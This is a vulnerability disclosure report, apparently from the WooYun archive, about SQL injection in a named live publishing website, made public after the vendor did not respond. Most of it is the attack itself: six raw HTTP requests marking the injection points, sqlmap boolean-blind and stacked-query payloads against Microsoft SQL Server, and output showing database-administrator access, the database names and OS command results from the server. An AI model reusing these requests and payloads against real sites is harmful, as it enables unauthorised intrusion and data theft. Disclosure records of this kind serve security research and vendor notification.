WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2015-11-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2016-01-11: The vendor has chosen to ignore the vulnerability; details are now disclosed to the public.

An os-shell can be obtained; the 6 injection points are bundled in this report.
~~~
GET /admin/Merop_Action.aspx?code=Book_Book_Hits&OperCode=Accumulate&val=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.ppm.cn/
Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJ
Host: www.ppm.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
~~~

~~~
POST /bookGuestbookList.aspx HTTP/1.1
Content-Length: 74
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.ppm.cn/
Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJ
Host: www.ppm.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Book_ID$equal=1&pageno=1
~~~

~~~
GET /GetArticleList_fhgc.aspx?M_ID$in=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.ppm.cn/
Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJ
Host: www.ppm.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
~~~

~~~
GET /GetFImg.aspx?M_F_ID=0 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.ppm.cn/
Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJ
Host: www.ppm.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
~~~

~~~
GET /GetRelevanceBook.aspx?BookID=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.ppm.cn/
Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJ
Host: www.ppm.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
~~~

~~~
GET /search.aspx?searchType=article&title=e HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.ppm.cn/
Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJ
Host: www.ppm.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
~~~

sqlmap output for the POST injection point:

~~~
---
Parameter: Book_ID$equal (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: Book_ID$equal=-7883 OR 9848=9848&pageno=1

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Book_ID$equal=1;WAITFOR DELAY '0:0:5'--&pageno=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
current user: 'sa'
current user is DBA: True
available databases [6]:
[*] [fhgf-www]
[*] [fhgf.web03.merop.net]
[*] master
[*] model
[*] msdb
[*] tempdb
command standard output:
---
nt service\mssqlserver
nt service\mssqlserver
---
command standard output:
---
Windows IP 配置

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::4884:e964:999d:b456%11
   IPv4 地址 . . . . . . . . . . . . : 10.2.176.211
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.2.176.254

隧道适配器 isatap.{4480FD8E-0207-404F-B3C0-0788365A409B}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 Teredo Tunneling Pseudo-Interface:

   连接特定的 DNS 后缀 . . . . . . . :
   IPv6 地址 . . . . . . . . . . . . : 2001:0:ca66:6ecb:1859:263:f5fd:4f2c
   本地链接 IPv6 地址. . . . . . . . : fe80::1859:263:f5fd:4f2c%13
   默认网关. . . . . . . . . . . . . : ::
~~~
Vendor status: the vendor could not be reached, or actively refused the report.